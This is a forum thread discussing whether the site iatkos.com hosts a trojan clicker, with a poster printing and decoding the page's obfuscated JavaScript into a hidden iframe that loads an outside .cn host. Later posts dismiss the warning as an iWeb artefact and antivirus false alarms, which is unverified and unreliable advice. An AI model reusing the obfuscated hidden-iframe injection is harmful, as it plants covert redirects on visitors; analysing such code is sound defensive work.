Jump to content

Beware iatkos.com


SaintEpsilon
 Share

30 posts in this topic

Recommended Posts

Uh oh. I visited that site but I didn't click on anything (I think). I'm going to contact Uphuck about this.

 

UPDATE: Just sent out an email and a PM to uphuck about this. I'm not going to visit the site till this is cleared up

Link to comment
Share on other sites

It's a trojan clicker....

<a href="http://www.viruslist.com/en/virusesdescribed?chapter=153317864" class="none_green">Trojan Clickers

This family of Trojans redirects victim machines to specified websites or other Internet resources. Clickers either send the necessary commands to the browser or replace system files where standard Internet urls are stored (e.g. the 'hosts' file in MS Windows).

 

Clickers are used:

 

  • To raise the hit-count of a specific site for advertising purposes
  • To organize a DoS attack on a specified server or site
  • To lead the victim to an infected resource where the machine will be attacked by other malware (viruses or Trojans)

Link to comment
Share on other sites

Just read the source of the html and I think they got something to hide...

 

Quick analyze:

 

<script type="text/javascript">document.write('

\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070

\u003a\u002f\u002f\u0061\u006e\u0061\u006c\u0079\u0073\u0074\u0069\u0063\u002e\u0063\u006e\u002f\u0069

\u006e\u002e\u0063\u0067\u0069\u003f\u0064\u0065\u0066\u0061\u0075\u006c\u0074\u0022\u0020\u0073\u0074

\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020

\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020

\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

 

decoded to ascii gives you:

 

<iframe src="http://analystic.cn/in.cgi?default" style="visibility: hidden; display: none"></iframe>

 

Whatever that is...I can't tell. It redirects to google. Quite suspicious if you ask me...

 

regards,

 

chris

Link to comment
Share on other sites

Important Update:

 

After publishing this story in my blog, a user commented:

 

eskurza has said it was made with iWeb. This is one of the tags the iWeb will put into a site it builds. There is nothing malicious about it.

 

I don't know why iWeb would do this but I trust this person and I think its pretty safe to say that iatkos.com is safe.

Link to comment
Share on other sites

Well, many AVs are hoaxing today because websites are getting more and more complex, especially if they put so much shi* in it like iWeb.

(Nothing wrong with iWeb, this is just the downside of making it that easy). So as long as you don't download or install an executeable or

plugin, it doesn't matter what AVs tells you.

Link to comment
Share on other sites

Mine neither...I visited it on Windows XP SP2 w/ all patches and Firefox 2 latest release + AVG + Ad-aware 2007 + ZoneAlarm + Spybot & D + Windows Defender.

 

I have this whole ton of security stuff installed and none of them detected anything.

Link to comment
Share on other sites

 Share

×
×
  • Create New...